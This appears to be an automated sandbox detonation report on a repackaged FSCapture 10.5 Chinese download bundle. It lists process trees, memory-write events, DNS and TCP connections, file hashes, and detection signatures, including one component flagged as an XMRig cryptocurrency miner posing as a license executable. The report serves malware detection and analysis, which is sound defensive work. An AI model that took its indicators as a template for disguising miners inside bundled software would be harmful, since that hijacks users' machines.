PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 468 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 468 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 1448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 1448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 1448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 1448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 1448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 1448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 1448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 1448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 1448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 1448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 1448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 1448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 1448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 1448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 1448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 1448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 1448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 1448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Windows\System32\rundll32.exe

"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\423Down.url

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.423down.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcb55446f8,0x7ffcb5544708,0x7ffcb5544718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,14640341848029947894,1071121887729062691,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,14640341848029947894,1071121887729062691,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,14640341848029947894,1071121887729062691,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2916 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,14640341848029947894,1071121887729062691,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,14640341848029947894,1071121887729062691,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,14640341848029947894,1071121887729062691,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5240 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,14640341848029947894,1071121887729062691,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5240 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,14640341848029947894,1071121887729062691,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,14640341848029947894,1071121887729062691,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4808 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,14640341848029947894,1071121887729062691,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4604 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,14640341848029947894,1071121887729062691,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,14640341848029947894,1071121887729062691,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5488 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 www.423down.com udp
US 45.151.132.50:443 www.423down.com tcp
US 8.8.8.8:53 repository.certum.pl udp
GB 2.18.63.21:80 repository.certum.pl tcp
US 8.8.8.8:53 50.132.151.45.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 21.63.18.2.in-addr.arpa udp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
GB 142.250.178.14:443 fundingchoicesmessages.google.com tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
GB 172.217.16.226:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 hm.baidu.com udp
US 8.8.8.8:53 226.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
GB 142.250.178.14:443 fundingchoicesmessages.google.com udp
CN 111.45.3.198:443 hm.baidu.com tcp
CN 111.45.3.198:443 hm.baidu.com tcp
US 8.8.8.8:53 226.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 lh3.googleusercontent.com udp
GB 216.58.204.65:443 lh3.googleusercontent.com tcp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 10.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 65.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
CN 14.215.182.140:443 hm.baidu.com tcp
CN 14.215.182.140:443 hm.baidu.com tcp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
CN 14.215.183.79:443 hm.baidu.com tcp
CN 14.215.183.79:443 hm.baidu.com tcp
CN 183.240.98.228:443 hm.baidu.com tcp
CN 183.240.98.228:443 hm.baidu.com tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
CN 111.45.11.83:443 hm.baidu.com tcp
CN 111.45.11.83:443 hm.baidu.com tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 ba6ef346187b40694d493da98d5da979
SHA1 643c15bec043f8673943885199bb06cd1652ee37
SHA256 d86eec91f295dfda8ed1c5fa99de426f2fe359282c7ebf67e3a40be739475d73
SHA512 2e6cc97330be8868d4b9c53be7e12c558f6eb1ac2c4080a611ba6c43561d0c5bb4791b8a11a8c2371599f0ba73ed1d9a7a2ea6dee2ae6a080f1912e0cb1f656c

\??\pipe\LOCAL\crashpad_860_GKCRAUMXVDLWOWRS

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 b8880802fc2bb880a7a869faa01315b0
SHA1 51d1a3fa2c272f094515675d82150bfce08ee8d3
SHA256 467b8cd4aacac66557712f9843023dcedefcc26efc746f3e44157bc8dac73812
SHA512 e1c6dba2579357ba70de58968b167d2c529534d24bff70568144270c48ac18a48ee2af2d58d78ae741e5a36958fa78a57955bd2456f1df00b781fc1002e123d2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7d060056d5949cfe0a5a85a269ab92d6
SHA1 84476fc8c726c7b49b36647efbd8eefefc1796a2
SHA256 e59db88d90a5e8a76c13f03a9303b8b4760d802ba04f8e6e9319ea5a7e8178f2
SHA512 76dc42d1b062540366a33c82529b0b1be276b70a721724aa2d194069f723af7dad909c18e1f43bda90fedd2fc7122ce5e0e84f0baa11b8b5b53ce7505f41caaa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 a02a6f10b1efe9531f5a7843914889c0
SHA1 c06853d25da8de31862da56e0cd5967caa0a2d6c
SHA256 976f1f3746e51577f007e0f1c389de964e99754fb968e8945b6afb7fd7dd00aa
SHA512 ff7480e1ecdb7916cb41a445422fbf795c9d13501334734ef3bcb0544c86b9f963123cd2afec2a23e30a4afbb5bfb3c39dbb656e5ffb1354597e64719eeb9811

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2f0219f16e9bf595eaa9d3eda96dac57
SHA1 77b1d3bb6c6f7bf296f31e1a79479a00f3f7c4c0
SHA256 e0c88006021565ded33203719840f71572935d3102f32d3d7321f66f52cbe395
SHA512 de7eb57bf4d215aa7adb7c789e32b424f012a43b1639072de37d8cf61507447b75b753032db66a7e770c8bab5c4a569466cfe5867249bcd4aa44886e493f05ab

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 807419ca9a4734feaf8d8563a003b048
SHA1 a723c7d60a65886ffa068711f1e900ccc85922a6
SHA256 aa10bf07b0d265bed28f2a475f3564d8ddb5e4d4ffee0ab6f3a0cc564907b631
SHA512 f10d496ae75db5ba412bd9f17bf0c7da7632db92a3fabf7f24071e40f5759c6a875ad8f3a72bad149da58b3da3b816077df125d0d9f3544adba68c66353d206c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 253eb772779c731bfe540f3302b3bc66
SHA1 618b12325ab860e96e6e43f5fb5d98e56e9b095d
SHA256 14904cf6f4a2f67f91aff0454943fa3bcbd35391e7b44932a0078f2715467f9c
SHA512 fe21a9f23f5c9bac6d136d907a0798f39949b1514fa6b0037eb900b552ea0e2aa7ec1901acdf54dbe69d6817ee43f0273d7954a82a35da93b73448decf276158

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 189c78f2753482b648413c706e58922c
SHA1 d40894b900d3ac19566a48c2be7a7f16d0da044c
SHA256 6caf0b5bbc3af4a22496e3a0c2a8c97ea43fbc64b50de5d997282cfb716f41e1
SHA512 5191d691bc6bd14d92f19d46e7071a5cd47992e82de51111258a31a9b4f921c3e7d4aeac91f8a270166b315b100992dbc3eadd3f8d09ec80f8cefab00d20b04c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 06d7e0034883af6b6b1f7f45c853a3c1
SHA1 270b21773098d626f44a7f25e399651db0f592ff
SHA256 fe3aec67b623b6f6aa3018fc2a6282c672a50716e857c5c7044bfcab9f9046e3
SHA512 b4f9c8f05ac9c2092e32508c7537321c979af51efbfbf918f9a2d780c17c1099c2c7893e67bd210393dae17cf18ae8d0020ac55301e0ebfe813cf28dea9be014

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe599503.TMP

MD5 5467cda56274bf714725bf5ee56a3457
SHA1 28b06f5498aeeac98d9640d9e75475c83a0727de
SHA256 d29ad04a42aa2dbdebdb8d9e653f9347feefda3d77f0ddda8fce601bde8e7cc1
SHA512 3dde75824a1ca9f8bf11738ffdcf04119689788e4a3eb714aac713a2ebf81ed823489826ea183647621ceb92892dcc6f30ef3040e8102e9e9204ea40c9056978

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 0ff54871559a99138b5e51802d83d9f0
SHA1 d9327a87889e7943ddd1030980403b7ccd7ea437
SHA256 a4d77b7325b5f1b604f53b3558d452e2b7fa0acf34de4d0d329d577e424731b6
SHA512 53d8d5e14c5334840a119894e09cc234e7dcdb665781c6e7fb6a30b371037b98911d326778d16779f7cfe0c0931756bbf67aec19d47478fc80ffb42a88a8dd27

Analysis: behavioral17

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win7-20241010-en

Max time kernel

122s

Max time network

131s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCrossHair.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCrossHair.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCrossHair.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCrossHair.exe

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCrossHair.exe"

Network

N/A

Files

memory/2064-0-0x00000000003B0000-0x00000000003B1000-memory.dmp

memory/2064-1-0x0000000000400000-0x00000000004A2000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win7-20241010-en

Max time kernel

119s

Max time network

125s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\libwebp.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\libwebp.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\libwebp.dll,#1

Network

N/A

Files

memory/768-0-0x0000000000170000-0x000000000018E000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win7-20240903-en

Max time kernel

120s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\FSCapture_license.exe"

Signatures

Xmrig family

xmrig

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\FSCapture_license.exe

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\FSCapture_license.exe"

Network

N/A

Files

memory/2696-0-0x0000000000E80000-0x0000000000EA0000-memory.dmp

memory/2696-1-0x0000000000400000-0x0000000000E80000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:49

Platform

win10v2004-20241007-en

Max time kernel

137s

Max time network

140s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCIcon.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3372 wrote to memory of 1096 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3372 wrote to memory of 1096 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3372 wrote to memory of 1096 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCIcon.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCIcon.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:49

Platform

win10v2004-20241007-en

Max time kernel

135s

Max time network

146s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin02.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin02.exe

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin02.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 101.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 105.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp

Files

memory/3888-0-0x0000025BEE740000-0x0000025BEE741000-memory.dmp

memory/3888-1-0x0000000000FF0000-0x0000000001387000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win7-20240903-en

Max time kernel

140s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe"

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A

Suspicious use of AdjustPrivilegeToken

